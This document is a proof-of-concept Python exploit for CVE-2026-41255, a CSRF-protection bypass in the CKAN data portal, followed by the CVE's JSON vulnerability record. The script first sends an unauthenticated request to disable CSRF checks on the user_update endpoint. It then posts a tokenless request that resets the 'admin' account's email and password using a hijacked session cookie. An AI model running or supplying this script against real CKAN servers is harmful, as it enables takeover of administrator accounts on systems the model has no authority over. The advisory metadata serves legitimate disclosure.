CVE-2026-41255

import requests # Target configuration target_host = "http://localhost:5000" vulnerable_endpoint = "/api/3/action/user_update" url = f"{target_host}{vulnerable_endpoint}" # Step 1: Send an unauthenticated request to trigger the exemption # This exploits the logic where the module-level variable is modified print("[+] Step 1: Sending unauthenticated request to disable CSRF protection...") try: # The specific endpoint that triggers the vulnerability logic trigger_response = requests.get(url) if trigger_response.status_code != 404: print("[+] Endpoint hit, CSRF protection likely disabled for this worker.") except Exception as e: print(f"[-] Error hitting trigger: {e}") # Step 2: Exploit - Send a malicious request without CSRF token # Assuming the attacker has a valid session cookie (e.g., via XSS or session hijacking) # or if the endpoint allows state changes without auth (less likely for user_update, but demonstrates the bypass) malicious_payload = { "id": "admin", "email": "[email protected]", "password": "newpassword123" } # Note: No CSRF token is included in headers or data headers = { "Content-Type": "application/json", "Cookie": "auth_tkt=..." # Replace with valid session cookie if needed } print("[+] Step 2: Sending payload without CSRF token...") exploit_response = requests.post(url, json=malicious_payload, headers=headers) if exploit_response.status_code == 200: print(f"[+] Exploit successful! Response: {exploit_response.text}") else: print(f"[-] Exploit failed. Status: {exploit_response.status_code}")

{"cve": {"id": "CVE-2026-41255", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:22.127", "lastModified": "2026-05-14T16:26:50.047", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.10 and 2.11.5, Access to the views via tokens or unauthenticated requests marked the endpoint as not requiring CSRF protection. The marking was a member variable in flask-wtf.csrf.CSRFProtect(), which was stored as a module level variable in the flask_app middleware. This API was never intended for request level changes, it is primarily a decorator for static configuration. An unauthenticated request could hit a protected endpoint, exempting it from CSRF protection for the life of the particular server process. (e.g. one worker of uwsgi). This vulnerability is fixed in 2.10.10 and 2.11.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/Shirshaw64p/security-advisories/tree/main/CVE-2026-41255", "source": "[email protected]"}, {"url": "https://github.com/ckan/ckan/security/advisories/GHSA-mcvf-jxcw-vj73", "source": "[email protected]"}, {"url": "https://github.com/ckan/ckan/security/advisories/GHSA-mcvf-jxcw-vj73", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}